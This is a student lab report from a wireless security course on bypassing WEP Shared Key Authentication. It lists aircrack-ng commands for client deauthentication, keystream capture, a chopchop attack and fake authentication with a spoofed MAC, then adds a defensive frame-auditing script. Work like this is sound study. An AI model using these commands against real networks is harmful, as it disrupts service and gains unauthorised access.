ASSIGNMENT REPORT
- Course: Wireless and Mobile Network Security
- Report session: Session 03
- Topic: BYPASSING WLAN AUTHENTICATION
- Instructor: Lê Đức Thịnh
- Report date: 24/4/2023
- Group: 802.11
- Class: NT330.N21.ANTT.1
- 20521047 20521047@gm.uit.edu.vn
- 20520514 20520514@gm.uit.edu.vn
Tested on TL-WR841N & ParrotOS because my Kali Linux does not support monitor mode on the TL-WN725N USB Wifi, so I use Parrot, and wlan0 is replaced by wlx9ca2f4fd78ac.
- All commands that I used
- To see the wireless interfaces, use
iwconfig
- To start monitor mode, use
airmon-ng start wlan0
- You can use the -c option to send the deauth attack to a specific client.
aireplay-ng -0 5 -a <AP's MAC> -c <Client's MAC> wlan0mon
- To see all access points, use
airodump-ng wlan0mon
- To sniff packets between the client and the access point, use
airodump-ng wlan0mon -c <channel> --bssid <mac AP> -w keystream
- If you do not have the .xor file, create it by using the chopchop attack.
aireplay-ng -4 -h <MAC of the device you use to connect> -a <mac AP> wlan0mon
- To fake Shared Key Authentication (SKA), use
aireplay-ng -1 0 -e "Nhom 802.11" -y <keystream.xor> -a <MAC AP> -h AA:AA:AA:AA:AA:AA wlan0mon
- Run attack.py, then you must open another terminal and run
airodump-ng wlan0mon -c <channel> --bssid <mac AP> -w keystream
./attack.sh <number you want> <mac AP> <wireless adapter>
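A defender-side counterpart to the commands above, as an added example that is not part of the original report: it audits raw 802.11 management frames for the two things this lab relies on, access points still accepting Shared Key Authentication and bursts of deauthentication frames. The MAC addresses, sample frames and alert threshold are constructed assumptions.

```python
import struct
from collections import Counter

AUTH, DEAUTH = 0x0B, 0x0C   # 802.11 management frame subtypes
DEAUTH_THRESHOLD = 5        # assumed alert threshold per capture batch

def mac(raw):
    return ":".join(f"{b:02x}" for b in raw)

def audit(frames):
    """Flag BSSIDs using Shared Key Authentication and BSSIDs with deauth bursts."""
    ska, deauths = set(), Counter()
    for f in frames:
        if len(f) < 24 or (f[0] >> 2) & 0x3 != 0:   # truncated, or not a management frame
            continue
        subtype, protected = f[0] >> 4, bool(f[1] & 0x40)
        bssid, body = mac(f[16:22]), f[24:]          # addr3 is the BSSID
        if subtype == AUTH:
            # SKA frame 3 is WEP-encrypted, so its algorithm field is unreadable;
            # the Protected bit on an authentication frame is itself the indicator.
            if protected:
                ska.add(bssid)
            elif len(body) >= 6 and struct.unpack_from("<H", body)[0] == 1:
                ska.add(bssid)                       # algorithm 1 = Shared Key
        elif subtype == DEAUTH:
            deauths[bssid] += 1
    bursts = {b: n for b, n in deauths.items() if n >= DEAUTH_THRESHOLD}
    return {"shared_key_bssids": sorted(ska), "deauth_bursts": bursts}

# --- constructed sample frames (not from a real capture) ---
def frame(subtype, dst, src, bssid, body, protected=False):
    fc = bytes([subtype << 4, 0x40 if protected else 0x00])
    addrs = b"".join(bytes.fromhex(a.replace(":", "")) for a in (dst, src, bssid))
    return fc + b"\x00\x00" + addrs + b"\x00\x00" + body

AP1, AP2, STA = "02:00:00:00:00:01", "02:00:00:00:00:03", "02:00:00:00:00:02"
SAMPLE = [
    frame(AUTH, AP2, STA, AP2, struct.pack("<HHH", 0, 1, 0)),   # open system request
    frame(AUTH, AP1, STA, AP1, struct.pack("<HHH", 1, 1, 0)),   # SKA request
    frame(AUTH, STA, AP1, AP1, struct.pack("<HHH", 1, 2, 0) + bytes([16, 4]) + b"chal"),
    frame(AUTH, AP1, STA, AP1, b"\x00\x00\x01\x00" + b"\xaa" * 12, protected=True),
    frame(DEAUTH, STA, AP2, AP2, struct.pack("<H", 3)),         # single deauth, below threshold
] + [frame(DEAUTH, STA, AP1, AP1, struct.pack("<H", 7)) for _ in range(6)]

if __name__ == "__main__":
    print(audit(SAMPLE))
```

Any BSSID reported under shared_key_bssids should be moved off WEP/SKA; enabling 802.11w (Protected Management Frames) on WPA2/WPA3 networks addresses the spoofed deauthentication frames.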